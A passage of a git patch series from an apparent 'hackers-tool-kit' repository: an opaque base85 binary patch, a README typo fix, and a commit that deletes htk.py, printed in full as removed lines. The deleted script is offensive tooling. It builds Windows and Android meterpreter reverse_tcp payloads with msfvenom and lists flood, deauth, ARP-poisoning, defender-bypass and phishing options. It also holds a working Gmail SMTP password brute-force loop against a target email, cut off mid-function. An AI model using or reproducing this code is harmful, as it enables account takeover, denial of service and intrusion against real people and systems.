z^ALHWB1N>k?3o<8Jw;x=MA>WE1DNQQ0wk{uNg1FDJ|`wD0^}7nVGto(M(vj~;|5|X zOc<^opXaPqmTOBM+{?nD8%rD`C5v=Wu1g=FAM*}o_Ec|CDfAYr_>Bl+wxegv03GuN zyLN>MWUW{`n`qC3+JK|D5de*xhs`2S-U=g{)++OthDFYQUDD@Op0Qby+`yg^JZ%#U z%-aEGQ?>)Dvp_%RnrmT54PN#1q@rbGZPE7!{CDC^%RAWd6PMVnWYpRf-E6~N(7FETbl%->(%>3%B9T0L*Fndu4uK3>Y?xVmKcLD7n8u3Dzyi{dpiV-dq z-f{=aj_?B8tXk;TN?OiniHoLBBVXORs|r0U9nv2-r0WN73X<-!;C|7=VHKzH~ zilFfhUJ;&PWC%d7l+R5aWCU}+`|dK(uL6KGNFY;~Qvy@8RrB&XZEwvtp&!1N2TueD zjW;5C)nID<72K2k@PV5-YgP?x1EeHlSuKyq=Ykqi@alz8u4c3|J26cGk3y8XRZ=pWn~KDcgKA86!?S!3XS8x^hK!0k%{%C7=9zTC zCY*_8c)-le@kW&Pwrd@FU5TL;*RWGcOG-9lbXVrZrHYE%#zqG{Ea%Oij~i+Sac>!n!d8l!8V77qKF@Iua(I{T`Kd{zUIX7r*?S0R;FH1#3#gZ7mh_+Cfz z4oI1HB9%WLj}jcj$f$q+bK-`iHAPfQsdxBFkec$Zu|-t&sNqnJq%#y zK@dns@4k(k9xW1zDk_hS_n3`XqSp+EYYJHYb{rWP1L#us9)-mum`-XQ z8MbT-G_)HDv4%0SI`1P(P67~GvWc~TMW5ysKj*h+Rq*2pSrp>Lr; z3xSy&`=PcBR7WI(bxX%9^&arEOunrl!GhQMJY#je%ZEwyyWQN&FF?md7D0PS7Gu;rX9r$>&dU{ zuX%oRr@o)oFf;XEA70^o`{S!E?*8?yDfcuLVQ&FVZGYuuOI9A7SxB8evu>V8QC?sS z2Y{6h%Vt(b`YT0oAZCCAz&13{XnJ%@s_gv`reCfN)$^HqRMD%!HQJ_QTQC|hOi|?~OB(`uT!^N7t3Qs1l~E-ldCqXF zG{rGm3QJ_zGN3p{*>n5&R&kDsdV{j>?qQ$HAd)o9H=PX*pRi^Q`1fz{R z1C`8;n>J~7sUo8sL)VcI!#fvu5-||zMqt!urECgZoD5zPD|(l<1dsG`vM*eS1@36b z((P8mJtcO~$iED6!c;^4cMbhq7(n@S#b#`5sA8|;hsE8ER(MQxIj*q;8YH(uK2V4P zo#pl2zvmt5;$W$X;4rf)DpbZjz7-dvfI-XfcM10vi{cTR>8P88!yD2h;*5SXe$V}h z(}fOMYDiyBr*?i_s4PS$*5J?ttNn(z4G#_N$2pzn)^aAk-@Q>s1@yFqK4wf7*Y`27*oF^Ik ztF9Wh-DiipySY6i10>%@Ac@y-d$lE=3~Kusb$jaDmaWnrQTxo9foIOB@aId;nPb}N z{-km+04G}*K^`GC3l?=R)cc6TK40HZbSf~ANA=wD7}d}@IJto^n82*wI2*)hgl9az z`MV0g9i^QcFYBF)S(dO*J_D6wWDTl1+aX*IY=KZZ2{AUX1x_R#SiIq=zs2v3tO78dOpMsQU} z-$HA~D(o&D?}6*4{htIrN>V|Jl+oeg2Te_ODCoL)+x&9R{JqWIWkxm?>B8``(o)eo z!zb90n4;H?ZqZu63l@6B5uG?jF}e&PhaDTBNV_BTam7dnUyP3C;UM0R@gd%@mCCTc zH!}bZgP4e}>G|d|8i`jf%dGEW*E~I-p17B`J)nMks6KA!L&2(Yrz>@4k}*y1cU$<%th<~!HE#0QK(hJPJ0p9``N_m zUnoDjWAy6~Kp8~@3;=4&T(@}GVDfMew4PBqoQMSuN~uz1SiDpR2W&^c=VYAW;W~%2 z$i~87sigwIs6=f{Jmn6kg=_r{LpfW?c!ZBE)*~1Jfeue>ai?XrQ`gX*t240{Meq_7 zvI)o9#Dr4257G_Wga7H^8M*FUT20)}ac!A60Zfm>n2+m5KICOwgi3 ztsBCCs<{@5o$5p*8J4J8AJZWUu-_5u8*KYgAqBM&k2tOHS6jSIb-<^pvveaIhfOZ39M2RjI&a z+^ZlRMUb3%L-Li0TBYN&f~RgeNfCJP#CC`1;D9LiIyi7LGE6b#`5@!M#fx!Z;+dG^ ztqCOu`g7yZo6*%&++=o^3w4ibg&)uQ^!w{y3Si776ZW!vYRqp8V`QuVK$i6LeT&|!} zv2uLc_eT%U9+a4P*By4+45!CGgEiAZrnChqmSxs~T^m9_dp_%?&*X-y4&5~V0Sr#d zv0;oV9Njef5#_0wZND}J1dnd~+qV)bY2j@4GMc}?vSpz+E2@8ZbhK=KEQUkmUeSEs zU9#`Gx5wyk@0&N3T0I4^D6}u2UA%PZN#!!iOaiwsO1-|1lGQnjd`g$p8DSP(H7OAX z)FXiWTSATif(rl|fK^<|)UhDZI^nj>Z=EA0#P$B|FTi=29e>J?o`4z71<+dSodPDlqw`QqnQ8E7uBD$F~4@~~Vb6Z2BYYiny6f{WI zLiMPdm z_%VMzVhb0MA+YFL!OZ8se<{5KFc8)Ks2V-^Ord;%9{-qlZ|huV^v5ORdJ)Ubaq`1u zikwb(PPx|EvPds&u@B7=(l8>Mhu1KxlXkM}lu&v^%i0cT&=DvivvQmBtddKl1~-uB zb+d~m8-}|Ojw9?6ddDw)DRZQfz!GTx9u>gYA>nFy@%U(Q1XhwNJUNy=fQ^4C^b!w& zFD9|eeA+{Fc=?w*sDjE?L!X8mw0BhrKOO3BphK%-13HTQBpep(v2eB{+La@d^;hP9 zE3KVlY&A*XV5SpCB~%uT;k&U9opKw678ntx%s2JY9&|$=LpYk=wNkWjqV7twKQV!( z8VbAw=uwHlh7Cu~dkObC(Z_nhN#0$|DtL&auKe=)W7{#t=^=utf1}eHfEt#@W*3+1 zppI~0Mj&loK=Tg+hZP1>qFkgK*f!U#-C50*>~I^6lOCP>&K))t?}?8_)%Ftdf6GBJ zmV5-@heislAS2L``rbZS+Pr&F@OD$vi^Eur4}prdqe@J#x_V*(vh9wi>4{~8JZpg9 zB^<48lHY%C58lavxV{m4s6_8i@^raldHKdc`Q0Z!La$%N|CW-n;qKT-EDKfr-XBSf zL-3(&4qWVNxdy1t9qu8(pETrh4kK^7Ix}>pa3zZ3PEn|aC7T{(UHAc!NN&Z72lPfv zrl!N>#Ufcrk}Dy@+kOrzn{os|Ed#ePHEXGpnWu5TsNvU>S1HIv|8ddtgBHLHc;zqt zO_Lviwb>G$5_l)3=5?t?ftB8|hFH#QMR7IDp7Kwa*I36)&MZJ#4io8XC>ZpLl91CS z*a$S;FtE43id@0Au&xE#%(Nt7O%V)bKH%?=4+K)6qp6T_a-@-6Pdz@8Jz zeEL&|bgJb^{uNFq8WSWFTW|qieEvBZs))%@HPC9Y0cUX*=-*JE#k>IzdkGm`YpgRW zwhh!@c-z(*4@t9XvlvS4!C8t8jwFonl2g6?l}BJ*lZ0V;`o`$H$AK6rCu@^j!XDjp z0%2$CaEgoA8VQhjZck8dvvzGpkXDZpi9ko|?`#N0o_`SN|HSd*)j1mgFo>_pSc%`e zlO+E{;k(E<0{VqAfk2Sf0GE=jMyK>2qjDs~>7y_Tt5#zi6Hzr^%$R{-$>lHP8bgRf zSBb}%F?uZ46&G8b^@z2G%tOLC++p$d&6{(@#eVUJa7qvgf^=U?EMB_F8Bj#wgETc+!l)>t1Y@Q?HBl&S>rSX52vf#_Fo0 z5|TC5wlD*KEfeQ>H@TcdDCPnuj|^A%*(PdtYgSN%&Aibi+qqm}K;Ou?4?~KDdb$I|V2{w8aNpA_E2uS0;6}@6y2`G5C zZi7SX2_j^bnE&%SgiVj|n_ISQsf2$wtS+y>^N0zW9@+n6xXv(Gmm${i2BV1DN+O|3 z`jV5vA-(TJkAOEwCBl4)kjxSGK-#-~39=X zzx}qhE=Oe+)BY1M)X=VtC9gnzkgl7qAKD(1`6fw?Esf8!vn?vs-%sjT;E4H-nEjwlCP#Jg|` z4IdwC8mFMg$^ZOs_)&WpyS*MbdoTDQ5TgP17yapt`13{MdoJO3hk-ARz=I0Iu0X-! zwu0Ta^(aoHV;h)QTcc89sMlbh{`4VqMFvpFp?U4k2M-^rVK2MY`GHqYPymKukC1z% zfu62h-?2O#H8@>sM0>N|c~XT{*mM0DW)p!bS~xo5!kgZ;u3`HgZ%r$aRz*ro!D*!e z45kX4tuj6wGrntuIZh+tSKofCM%W(>zxM@b1XBl1){2&?lV0f4uz3U>_5skY0kV?c zeYYFuYJGjZHpB@0`OO2ds=ONO#lv}Lq(b)`U3JCi z5c)<_)=Z!F{7cj;Op#q>0=yxmP)?pn9%znyZjb!q>C*;}LnLfOau0wWpzfN=7V_WI zDt~Nv{}+NbseVhHrkytNlladclt20Hu5b&3?c1wyfi{fJo}Se-f6T%*<=(zFa6)SX zO-hf|^^Jr)ct21i``c9}e$7pt_AH$=Z_HD3d~$s~&{j70n}&NL_je5`v`nBe6ni9W z{@g(0PSQx1S7|$&zXY74LvWa_sMGBx*6^Lrop`Hh*GqfvGCm1jISq8^^7G)sinC|# zym@UIDcD#l{IxI5>{6pu_XVPR!_?ULDuOZcSA&pI##cCYf{TlbK~L3H#;YlKyc}|k zPX)!>1s6K!LU9OcE8K_89UaN&LKaPup4C{pOz~VXy2J=4h9Z)Jk`fgq7tC7TksKXU z^zu0>6_&tQvdL%_3T*Bbi-j=qSX>5aIqNm;llc0HG)M)UGvxMwDa3GRAqu`pxCI(G zuqgSKL9zy)0QfS}oMMxMjnr6InKYH1YCe2y(4K>tPp5>p1IhT=`B z5E2SzfssBB$bn{llC6c>dh5g5$NfOX{rl(29q=KeoSxG6?@uC~SxOey*MVaaq7=x2 zGvC%OhKReQ0M>~};;T@kSeOyWZ#P_|#~WCtUp#bg^+8y`vDz!w)A;_$7xzIs9=_J~ zDln_sfhRvpEL7W~H$Gg!)V9+TVjY91YDeY46p?-aJGv99KLM0?HjjwWHlif{AbEsJ zXM|1D07+Q2N=3yO(xRQ{@9-Y%PJ#Zyu_0$CN?M09=#S%0XB~KY6?3s{2#X1iYeGNo z$9f3-x+0u$C^Pz>S<%>XSi{6&kPID%xHpmw!tmhCv(l}YTyovd)zZ9SKUs*mtYGHw zAxD5)uY&Q`>Tv24?q-HN;&=CQXnO56#h+@h(JU2Pq3FWj(L%#uOSe%%+v?hz-(xjH?nN z9_t{uIi+~PS_;rvfC3l`SLfJNWK#?;y2xk-vcEjD6w7#wt==*YQ$i3XRBr#b6L;hJ zEW`BgF;*0>1;A;Al2Uov82DC@T-gml_#&n%Qrez7KuYZd zkB9b=SbVx&kEj>$yEKF=^>J8{`YUbtlK`^8EFH@o&59H0sJSZaS4gfHT;vzO4oL`j z7CVi%We*YaPpC_lhQD_<_!l?N2p>i0vlQ)E3{qlz^J}j7E;;i)2EY_4VMH8 z`oiNA6S>$WPCeg<+i*#G(UB~Qk>kkI4EhB^|AGEeSi9B&R1?xocW(s&O0vaZX)L%3Xe&tb>Rk7IAoUBbY@;9SzSnDlN*+3=#XU_;X*}?cfvKhWrJ&Q6 zELq}>KE(_O(_s~}2^PEuwbOPH_JM(OUEqtZ32G}$QBu^N+AL92EK7FKpZV>#Fy9WT zXY!Jx@s?3Kht2RV*{``tNn7yXMW91yHYkB3v2SxLoZ3RK)Y3i;xAUqo!8*&674L-U6brf3==OtZXi zP*5|$u;LxS-sl?P!TOd|Xi)=mJ6z7IPX83bOo30*<_OZ55sn>$(%p~fwNSFj%cwEx zoTQ$r*@C;Ge_-{DZv$I`c|ta--(>Xp0$QY8A?PAC3@7Sp%s0358_NXuk_vk&uzh(i z&Q_kYZTK7vx3yZvQ*WnVJ&dS1jh?-2IUI}@OEwH(*mz_ zm=31m(XW6^fZT(4k9adUqx?seI8ABA3Vl-4#c{_%I5!Aa(}y~xuGp`*o_Q!f8io~6 zc^gB=9|;Kn!rUqxSREiN1JystPiB}-ok{smWEbdfH8c##&dvtWxG+by;q-hxJ*W+< zvHjIhvG9F08DcJ5c?1%!NvIDLd*9r59MlM*<83E)y25GS{Pi=B_HOTSC53V_? zfFks-L;!&c$62q2L8vSSJDgCYojKF+nIXwDs@#+2GJcJmFl*FybCc*HE!TgZ=6i&j(%318&>aLucx z96Xs$1Z1aklUk2%*ZOD+rRB?az(FHru;(L>NTt=|_@LuhRzQN!@-uE^7KMI%{{RD@ zfMGktWlfl1A*2wh+IMWE@vUy>*?hjc52qr$r)E^t=xsf5$+ceU2d8(tOqQE-uaq4< zn`1i|0)55Ac><dk1VUJtu;r7qw7keC{1CDHjixVrG6|sX4HR! zFea~(LsbL?%LOJ2=`5_J+!b>I^Z8fu|C4nC9#FE**#Qd&GnB6J_!B@%n3ulbxm(ys zn?nxegOildvjAMK^9#6R+N=S@7PPJh{SbVIrK zzTBvaOq7&?(or=rv9)yq^SN804kR2O?sK)@E>yb@C#8EtO7*1ckSY`dn8K|u^qU?BxFGMt_j(7}rupkJo^==9IFqk_-&;&6vc z+8)fOVOMe-JyJK(@@<7D@=LBLI&#he43o?aePncSVoXG1R8_xSr2eqV0i_#~B0{@) z2{~~D0w&171=^n1>npCXwS_0ZXOiv&FZ2_1s%2Rx??aB;3O$_zmP#v(`P7zf^8Xnr ziz;abG0Fcwh}xDufLykoblVw@64xOI_+o|d-HC7vTU~$KHdP!z31I13A#A{j{4mWl zJ)d_%ks=S?6R=tpa^U6{FZSRxwxut&JT2m1QiRBiX=$RCRqTrNYz@k)4IIGh zBtU0OZnv?thwrM7Nm{pXqH>$`(=Akw9xA35yxj66*+ia}T_5#6Hl2ehKq#3Hgp z(QwoU4(1N%3v|*uY1U^t50bn!u&0XG@al^b#O(}{*4e&p-O(~H>tyr}m0*xr6TOkJ zwU7Zs)_?}VWB7XJOpZzg2G==*r|^ez?EG&KVOZ1uRnP8SykG$x?)Q7hKO}}XvXrco z3BLZT2%qS>e;Fg(B8C1i-`jwBhW~br6BfPP>eUtS3)8H@CVxQ80zn@1yMNFZe(svO z$x+@+2W9AIPqG}Xd;qIB=b&@|?LBtsA3@xMnI0{!_dZ!_W=1)GWEIaY;{N)Dhh3_u zx^3-2Qab%Rsn-G&NI)Y!2JQ3W_NqH+uX*n6f!aiQ1KB8^c3_5LNFq$5BuRt z@a+v|L4SjVsre<7u#nw{c-jGsPkk%KA|=8oZ;Z;4)yMM?K)5nc;rCup`hx2>{+5m#TUaxmr)^WVdnS zrEG5l=lHbu0bEh~0ZLH5-egp(_1c1ACWDT~<-ibMntma)U}So_LZ7 zj^-`1lv+ta0hzN|;<1&AiUNGz0gPN@LLLFxW)(>ldBY`t=O;NGPQoX=+LVSs>@QlX zK0xZoU{6oRD%fxW8XA)OVN>p|NDeYUh{YGQfbNJ2gH)%%oVG)Lb5H{WF`N!Mpv3}t znRc<$F*cg((0zIV&gEo>X8cB<>6#5mit&($jwO6lHx44UV%sPv4z7A|Y17$W` zh{IbeKr81KJ@RhyEcSiw`MTxP1?|NWU5E04TIN9Y2owo-s};Js??dcn!|Vn)Rc9Hb zkSMQJpD$xXqsitMBF35V?flC)lB}Y0AnW>c#oHS9=x-1@M3iH$met8p%%&}_5kIkk zq0wa&t(HTmhP7FXvJ&Ph!~tMy)a7(8wtV2Oh*ZKDItifZ)R?i?`-0<$W&w@sBN$JZ z46v0GS;qE8LYIK}P0nYmQX~k~xP40FoI+Wmt0NgMp|+8#YswW|^Ms`V$zg%ym_u(~ zh#tqEC6Y?$ly-5RN=@ELh1{NSb$+oc=DCeD_V^|esQ}`#cWc-_upPTs82R|Enm9G} zT((~;f|iAF&^YBUqDBos0u90AX$f;OrZSB zL%%4Ky$`y9y28WRctI?}t>RBV-A;1^A*sU0`0&laM7s-o{{GkvV{jN>J}WA7ycq#tHV2&x!96!VvaCwS#%_qG#8<`Kt4Kj3Y7p|QjS=JDX((bAX+-$ zy0w$gA6?l^A_yX?5X31yBL{V0B0(fQWw|&sq2t5Ur)r2v6TuMH+K&$uGtxPJq_<%`wvA#=2z z%7&deF&d#(^_fBVTJ>n9)wLdn@&&U#zHahIteqh!ILcR=xIiTSQ?h}Zg>lfA7tlUP zOIO<4|Nr(a(IRxur-v>s=1**WII~5 z`F>b-Qk*09;?)~BdOv@nJO+qnDZlDN!W0@;+t)9?nMT{HxFXp^dTLd=$om#dQP?+i z6xG$U%tnPGDJ}{IHGpj-V?owlG6Kr?{`{phf4C85qB*#v58=Q$EEU9%CSVroPf8Kx zW)Z=h>SjIZ+EZTQ;vxUF?Jk$)Ol+KR$Qg)Mso6Z&`46$%a4CI&K6YN;oyb zD56NS^;rcjl7oIT3k-idZj+&KPDPc*!rYnAokPM1k?$ytWp6i8mhqfO(sBs+px zPl{$weRitu*nmljO}-fdS}HYAWL@O4DMnVQsy=Dzxh;=8GPXtB@BLHU0Xdoh+QGy{&?kTL^GgDG!A<9;{VUVW!xqgKe8Vhxi-mA6`% zD^@ECYwh0I*!lH(48OD5r!zP6m!|jbb?h(m69Em0d;R4i|OTgWc>T1^>1y4a5~^@rPjCN z@J>gic@FHFKmc{jD;_#QvZLgfVCF`JTr<;_EVH8Vg!M+7mhXP^RpZLyE3q+taf2cL zRq+ib)GX&3>1zG~s^MR~4`wtE*%U66+iIlLivN14E|=}Bl&j44Kiv9@!zW_p%z zNbiZb>-~@Tpwp@Pzpgj^i-97dHqHUCj670n2Vw!$?aGvp%KNf()K|~Z=*TXn-`MfD zzSsLgE^va?2F5c5w<|_DC3oI=P6Z{G)ZV_nU_fob=Zt%CA|sif3LPc6uqWz61p@T< zL9}l}to-bTBU*Qeq7GR}2W$seRubfajj@DhOW%u37HAn=o(h0T&w}L5ohiu*`s(_I zt0kVa_oOlp<@rT{w-frbZF`}h|np&husMZbBTWT zkw$tv#-neY$rNtQoj%<=fqKVxneY40W-nj!<2oOxl6D>L|3J!AM+5w27B8W8oTgU) z%jiQW_K366Nwd6A|2B|1^&4`m2(RHG(cD=1At)!wkIO{4{!u=o)JB%PN`Ir_ue@J& G|M5Q#Xe46* literal 0 HcmV?d00001 From 84fbd29f619f666acaeaae4225fe792195242940 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:34:28 +0100 Subject: [PATCH 014/214] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index f3ea38a..c0a7a7d 100644 --- a/README.md +++ b/README.md @@ -3,11 +3,11 @@ Its a framework filled with alot of options and hacking tools you use directly i from brute forcing to payload making im still adding more stuff to see updates check on my instagram @unkn0wn_bali -![](tools/sc reenshot.png) +![](tools/screenshot.png) -![](tools/sc reenshot2.png) +![](tools/screenshot2.png) -![](tools/s creenshot3.png) +![](tools/screenshot3.png) # install * `git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` From 1492a1416ca6e0e08b793d8c79c4e83b4ae43278 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Feb 2019 01:04:48 +0100 Subject: [PATCH 015/214] Delete htk.py --- htk.py | 1955 -------------------------------------------------------- 1 file changed, 1955 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 894e4f1..0000000 --- a/htk.py +++ /dev/null @@ -1,1955 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - print N+""" _ _ _ _ _ _ _ - _ _ _ _ _ _ _ - | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ - | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| - | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m - |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - 